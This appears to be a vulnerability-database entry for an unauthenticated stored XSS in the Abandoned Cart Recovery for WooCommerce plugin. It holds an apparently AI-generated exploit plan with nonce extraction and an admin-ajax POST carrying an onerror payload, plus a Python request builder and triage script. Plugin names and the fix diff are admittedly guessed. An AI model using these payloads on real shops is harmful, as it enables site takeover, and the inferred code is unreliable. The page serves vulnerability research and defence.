[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fHgxMUZ5-IBGBKnmkRpHxOx6dDtFMFmtKH7y8PxyH27I":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-32526","abandoned-cart-recovery-for-woocommerce-unauthenticated-stored-cross-site-scripting","Abandoned Cart Recovery for WooCommerce \u003C= 1.1.10 - Unauthenticated Stored Cross-Site Scripting","The Abandoned Cart Recovery for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1.10 due to insufficient input sanitization and output escaping. 
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","woo-abandoned-cart-recovery",null,"\u003C=1.1.10","1.1.11","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-20 00:00:00","2026-03-26 20:52:07",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F80153f79-0fb0-458b-a39b-c4cd726546f9?source=api-prod",7,[],"researched",false,3,"This research plan focuses on identifying and exploiting a Stored Cross-Site Scripting (XSS) vulnerability in the **Abandoned Cart Recovery for WooCommerce** plugin. Since the vulnerability is unauthenticated, the primary attack surface involves the frontend AJAX handlers used to capture cart data (email, names, etc.) as users interact with the WooCommerce checkout or cart pages. Every file, hook, parameter and option name below is inferred from the advisory and from typical plugin structure rather than read from the plugin source; confirm each against the 1.1.10 tag before relying on it.\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Stored Cross-Site Scripting (XSS)\n*   **Location:** Frontend AJAX data capture (saving abandoned cart details).\n*   **Cause:** The plugin captures user-provided information (such as names, phone numbers, or email addresses) via AJAX and stores it in the database without sufficient sanitization. Later, when an administrator views the \"Abandoned Carts\" list or details in the WordPress dashboard, this data is rendered without proper output escaping.\n*   **Impact:** An unauthenticated attacker can inject a script that runs in the administrator's browser inside wp-admin. WordPress sets its auth cookies HttpOnly, so `document.cookie` will not normally yield the session; the practical impact is that the script acts as the administrator from within the page (for example, calling the REST API with the REST nonce wp-admin pages expose to create a new administrator account), which is full site compromise.\n\n### 2. 
Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Vulnerable Action:** `wp_ajax_nopriv_vi_wacr_save_cart` or `wp_ajax_nopriv_vi_wacr_update_cart` (inferred from typical VillaTheme plugin structures; the `action` POST parameter is the hook name minus the `wp_ajax_nopriv_` prefix, and the `nopriv` registration is what makes the handler reachable without a login).\n*   **Vulnerable Parameters:** `first_name`, `last_name`, `phone`, or `email` (names inferred; read them off the plugin's frontend JS).\n*   **Authentication:** None (unauthenticated).\n*   **Preconditions:** WooCommerce must be active. The plugin must be configured to capture \"Real-time\" abandoned carts (assumed to be on by default; verify in the plugin settings).\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** An unauthenticated user visits the WooCommerce checkout page.\n2.  **JS Execution:** The plugin's frontend script (`abandoned-cart-recovery-for-woocommerce-public.js`) monitors input fields.\n3.  **AJAX Trigger:** When the user enters data, an AJAX request is sent to `admin-ajax.php` with an action (e.g., `vi_wacr_save_cart`).\n4.  **Storage:** The PHP handler (likely in `includes\u002Ffrontend.php` or `includes\u002Fdata.php`) receives the `POST` data and uses `$wpdb->insert()` or `update_option()` to save it without calling `sanitize_text_field()`. Note that `$wpdb->insert()` parameterizes its values, so this is not SQL injection; the markup simply lands in the table unchanged.\n5.  **Sink:** The administrator navigates to **WooCommerce > Abandoned Cart**. The plugin fetches the stored data and echoes it into the admin table or modal without using `esc_html()`.\n\n### 4. Nonce Acquisition Strategy\nThe plugin likely uses a nonce to protect its AJAX actions, localized for the frontend. That nonce is a CSRF control, not authorization: for a logged-out visitor WordPress derives it from user ID 0 and an empty session token, so a single GET of any page that enqueues the script yields a value that stays valid for its full lifetime (12 to 24 hours) for every unauthenticated request, and it does not narrow the attack surface at all.\n\n1.  **Identify Script Localizer:** Look for `wp_localize_script` in the plugin source (likely in `includes\u002Ffrontend.php`).\n    *   *Search Command:* `grep -r \"wp_localize_script\" .`\n2.  **Target Variable:** Identify the object name (e.g., `vi_wacr_frontend_params`) and the nonce key (e.g., `_vi_wacr_nonce`).\n3.  
**Extraction Steps:**\n    *   Create a WooCommerce product: `wp post create --post_type=product --post_title='Test Product' --post_status=publish`.\n    *   Navigate to the product page or checkout page using `browser_navigate`.\n    *   Use `browser_eval` to extract the nonce:\n        ```javascript\n        window.vi_wacr_frontend_params?._vi_wacr_nonce || window.vi_wacr_params?.nonce\n        ```\n\n### 5. Exploitation Strategy\nOnce the nonce and action name are confirmed:\n\n**Step 1: Inject Payload**\nSend a `POST` request to `admin-ajax.php`.\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=vi_wacr_save_cart&\n    _vi_wacr_nonce=[EXTRACTED_NONCE]&\n    first_name=\u003Cimg src=x onerror=alert(\"XSS_SUCCESS\")>&\n    last_name=Attacker&\n    email=attacker@example.com&\n    phone=123456789&\n    cart_data=[]\n    ```\n    *(The body is shown one field per line for readability; on the wire it is a single line and the `\u003C`, `\"` and `>` characters of the payload must be URL-encoded. Note: Parameter names like `vi_wacr_first_name` might be used; verify in the source code or by inspecting the checkout page HTML.)*\n\n**Step 2: Trigger Execution**\nThe payload is now stored. It will execute when an admin views the abandoned cart list.\n\n### 6. Test Data Setup\n1.  **Install WooCommerce:** Ensure WooCommerce is installed and the setup wizard is bypassed.\n2.  **Create Product:** `wp post create --post_type=product --post_title='Exploit Product' --post_status=publish`.\n3.  **Plugin Configuration:** Ensure \"Capture Abandoned Carts\" is enabled.\n    *   *Check:* `wp option get vi_wacr_params` (or similar option).\n4.  **Add to Cart:** Navigate to the product page and click \"Add to Cart\" to ensure a session is active. A product created with `wp post create` has no price and is therefore not purchasable, so if the button is missing set the `_regular_price` and `_price` meta on the product (e.g., `wp post meta update \u003Cid> _price 10`) and reload.\n\n### 7. 
Expected Results\n*   The `http_request` should return a success status (e.g., `{\"status\":\"success\"}` or `1`).\n*   When the administrator logs in and navigates to the **Abandoned Cart Recovery** menu, the browser should trigger the `alert(\"XSS_SUCCESS\")`.\n\n### 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to confirm the payload is in the database. Match on a marker from the payload actually sent in Step 1 (`onerror` for the `\u003Cimg>` payload above; `\u003Cscript>` only if that is what was injected):\n    *   *Command:* `wp db query \"SELECT id, first_name FROM wp_wacr_abandoned_cart WHERE first_name LIKE '%onerror%'\"` (the table name is a guess; verify it via `wp db tables`, and check the prefix with `wp db prefix` rather than assuming `wp_`).\n2.  **Admin View Simulation:** Use `browser_navigate` as an admin to the abandoned cart list page:\n    *   *URL:* `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=vi-abandoned-cart-recovery` (verify slug in `admin_menu` registration).\n    *   Check for the alert or the payload in the DOM.\n\n### 9. Alternative Approaches\n*   **Payload Location:** If `first_name` is sanitized, try `email` or `phone`. Some plugins store the entire `cart_data` object; if the plugin displays product names in the admin and doesn't escape them, you can try injecting XSS into a product title (requires higher privileges) or manipulating the AJAX `cart_data` parameter directly.\n*   **Action Bypassing:** If the handler verifies with the default action (`wp_verify_nonce($nonce, -1)`, or `check_ajax_referer()` with no action argument), then any nonce the site mints with `wp_create_nonce()` and no action, from any page or plugin, will pass. A nonce created for a different named action will not, because the action string is part of the nonce hash.\n*   **Session-based Tracking:** If the plugin requires a specific WooCommerce session cookie, ensure the `http_request` includes the cookies returned from the initial page visit.","The Abandoned Cart Recovery for WooCommerce plugin allows unauthenticated users to inject malicious scripts via frontend AJAX requests that capture cart data. 
These scripts are stored in the database and execute in the context of an administrator when they view the abandoned cart recovery list in the WordPress dashboard.","\u002F\u002F Inferred from Research Plan: includes\u002Ffrontend.php\npublic function vi_wacr_save_cart() {\n    \u002F\u002F Unsanitized input from POST request\n    $first_name = $_POST['first_name'];\n    $last_name = $_POST['last_name'];\n    $email = $_POST['email'];\n    $phone = $_POST['phone'];\n\n    global $wpdb;\n    $table_name = $wpdb->prefix . 'wacr_abandoned_cart';\n    $wpdb->insert($table_name, array(\n        'first_name' => $first_name,\n        'last_name' => $last_name,\n        'email' => $email,\n        'phone' => $phone,\n        \u002F\u002F ... other fields\n    ));\n}\n\n---\n\n\u002F\u002F Inferred from Research Plan: includes\u002Fadmin\u002Fadmin.php or display logic\nforeach ($abandoned_carts as $cart) {\n    echo '\u003Ctd>' . $cart->first_name . '\u003C\u002Ftd>'; \u002F\u002F Unescaped output\n    echo '\u003Ctd>' . $cart->last_name . '\u003C\u002Ftd>';\n    echo '\u003Ctd>' . $cart->email . '\u003C\u002Ftd>';\n}","--- includes\u002Ffrontend.php\n+++ includes\u002Ffrontend.php\n@@ -10,7 +10,7 @@\n-    $first_name = $_POST['first_name'];\n+    $first_name = sanitize_text_field($_POST['first_name']);\n-    $last_name = $_POST['last_name'];\n+    $last_name = sanitize_text_field($_POST['last_name']);\n-    $email = $_POST['email'];\n+    $email = sanitize_email($_POST['email']);\n-    $phone = $_POST['phone'];\n+    $phone = sanitize_text_field($_POST['phone']);\n\n--- includes\u002Fadmin\u002Fadmin.php\n+++ includes\u002Fadmin\u002Fadmin.php\n@@ -25,5 +25,5 @@\n-    echo '\u003Ctd>' . $cart->first_name . '\u003C\u002Ftd>';\n+    echo '\u003Ctd>' . esc_html($cart->first_name) . '\u003C\u002Ftd>';\n-    echo '\u003Ctd>' . $cart->last_name . '\u003C\u002Ftd>';\n+    echo '\u003Ctd>' . esc_html($cart->last_name) . 
'\u003C\u002Ftd>';","The exploit targets the plugin's frontend AJAX mechanism for capturing cart data in real time.\n\n1. An unauthenticated attacker loads any WooCommerce page that enqueues the plugin's frontend script and reads the nonce from the object localized for it (the plan's inferred names are `vi_wacr_frontend_params` or `vi_wacr_params`; confirm the real name against the plugin's `wp_localize_script()` call).\n2. The attacker sends a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the inferred action `vi_wacr_save_cart` and that nonce.\n3. The payload is JavaScript placed in a text parameter such as `first_name`, `last_name`, or `phone` (e.g., `\u003Cscript>alert(document.cookie)\u003C\u002Fscript>`).\n4. The plugin stores the value in the database without sanitization.\n5. The payload runs when an administrator opens the 'Abandoned Carts' menu in the WordPress backend, because the stored value is echoed into the page without HTML escaping.","gemini-3-flash-preview","2026-04-18 01:39:34","2026-04-18 01:39:56",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-abandoned-cart-recovery\u002Ftags"]
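Review bot: in the `includes/frontend.php` hunk of the research_fix_diff, the `sanitize_*` swaps are input-side defence in depth and do not by themselves close the sink: rows written before the fix stay in the table as-is, the `cart_data` blob that section 9 of the plan mentions is not touched, and the handler shown has no `check_ajax_referer()` at all, so a nonce check should be added alongside the sanitization rather than assumed. The header `@@ -10,7 +10,7 @@` also does not match a hunk body of four removed and four added lines with no context. Both points are expected for a diff the page labels inferred; the 1.1.10 to 1.1.11 tag diff on plugins.trac.wordpress.org is the record to check this reconstruction against.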
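Review bot: the `includes/admin/admin.php` hunk escapes only `first_name` and `last_name`, but the display loop reproduced in research_vulnerable_code also echoes `$cart->email`, and the insert stores `phone` as well; every column rendered into that table needs `esc_html()` (or `esc_attr()` inside attribute values), so the fix as written would still leave an unescaped sink wherever the admin list prints email or phone. The header `@@ -25,5 +25,5 @@` likewise does not match two removed and two added lines.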
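The following Python is an added example and is not code from this page, from the plugin, or from the research run above. It implements the nonce-extraction step of section 4 and the request body of section 5 in a form that does not depend on a regex guessing where the JSON object ends, and then runs the kind of triage over stored rows that section 8 needs instead of grepping for a literal `<script>`. Every plugin-specific name in it (the localized object `vi_wacr_frontend_params`, the key `_vi_wacr_nonce`, the action `vi_wacr_save_cart`, the column names) is the plan's own inferred guess, and `SAMPLE_HTML` and `SAMPLE_ROWS` are constructed, not captured from a real site.

```python
"""Added example, not the plugin's code: nonce extraction and request building
(plan sections 4 and 5) plus a triage pass over stored rows (plan section 8).
Every plugin-specific name below is the plan's inferred guess, and the sample
HTML and rows are constructed for this example."""
import html
import json
import re
from urllib.parse import parse_qs, urlencode

# Constructed stand-in for what wp_localize_script() emits into a page:
# <script id="<handle>-js-extra"> wrapping `var <name> = <json>;`.
# Handle, variable name and keys are assumptions, not confirmed plugin values.
SAMPLE_HTML = r"""<!doctype html><html><head>
<script id="abandoned-cart-recovery-for-woocommerce-public-js-extra">
/* <![CDATA[ */
var vi_wacr_frontend_params = {"ajax_url":"https:\/\/shop.example\/wp-admin\/admin-ajax.php","_vi_wacr_nonce":"3f2a9c1b7e","capture":"1"};
/* ]]> */
</script>
</head><body><form class="checkout"><input name="billing_first_name"></form></body></html>"""

PAYLOAD = '<img src=x onerror=alert("XSS_SUCCESS")>'  # same marker payload as section 5


def localized_params(page_html, var_name):
    """Return the object wp_localize_script() assigned to `var <var_name>`.
    raw_decode() parses exactly one JSON value from the brace onward, so nested
    objects and the trailing ';' are handled without a brace-matching regex."""
    m = re.search(r"\bvar\s+" + re.escape(var_name) + r"\s*=\s*", page_html)
    if m is None:
        raise LookupError("no localized object named %r" % var_name)
    obj, _end = json.JSONDecoder().raw_decode(page_html, m.end())
    return obj


def nonce_from_params(params):
    """First string-valued key whose name contains 'nonce'; plugins name it inconsistently."""
    for key, value in params.items():
        if "nonce" in key.lower() and isinstance(value, str):
            return key, value
    raise LookupError("no nonce-like key in localized params")


def ajax_body(action, nonce_key, nonce, fields):
    """Form-encode the admin-ajax.php POST the plugin's own JS would send.
    urlencode() percent-encodes the payload, so '<', '"' and '>' survive the wire."""
    return urlencode({"action": action, nonce_key: nonce, **fields})


def decode_body(body):
    """Inverse of ajax_body (single-valued), for checking what a captured request carried."""
    return {k: v[0] for k, v in parse_qs(body).items()}


# Triage side: tag openers, inline event handlers and javascript: URLs in stored values.
MARKUP = re.compile(r"<\s*/?[a-z!]|\bon[a-z]+\s*=|javascript\s*:", re.I)
TEXT_FIELDS = ("first_name", "last_name", "email", "phone")

# Constructed rows standing in for the abandoned-cart table the plan guesses at.
SAMPLE_ROWS = [
    {"id": 1, "first_name": "Ada", "last_name": "Lovelace",
     "email": "ada@example.org", "phone": "+44 20 7946 0000"},
    {"id": 2, "first_name": PAYLOAD, "last_name": "Attacker",
     "email": "attacker@example.com", "phone": "123456789"},
    {"id": 3, "first_name": "O'Brien", "last_name": "Smith & Sons",
     "email": "x@example.net", "phone": "<svg/onload=alert(1)>"},
]


def flag_suspicious_rows(rows):
    """(id, field) pairs whose stored value contains tag or event-handler syntax.
    Row 3's O'Brien and Smith & Sons are legitimate and must not be flagged: quotes
    and ampersands are an output-escaping concern, not evidence of injection."""
    hits = []
    for row in rows:
        for field in TEXT_FIELDS:
            if MARKUP.search(str(row.get(field, ""))):
                hits.append((row["id"], field))
    return hits


def esc_html(value):
    """Approximation of WordPress esc_html(): encode &, <, >, double and single quotes
    so the browser renders a stored payload as text. This output-side step is the part
    of the fix that decides whether the admin page executes the markup."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    params = localized_params(SAMPLE_HTML, "vi_wacr_frontend_params")
    key, nonce = nonce_from_params(params)
    body = ajax_body("vi_wacr_save_cart", key, nonce,
                     {"first_name": PAYLOAD, "last_name": "Attacker",
                      "email": "attacker@example.com", "phone": "123456789",
                      "cart_data": "[]"})
    print("POST", params["ajax_url"])
    print(body)
    print("flagged rows:", flag_suspicious_rows(SAMPLE_ROWS))
    print("rendered safely as:", esc_html(PAYLOAD))
```

Parsing the localized object with `raw_decode` rather than a `{.*?}` regex matters when the plugin nests objects (settings, translations) inside the same variable; the regex approach silently truncates. The triage regex is deliberately a heuristic over stored values, so run it against the rows the section 8 query returns, not against rendered output, where escaped text will still contain the literal `onerror=`.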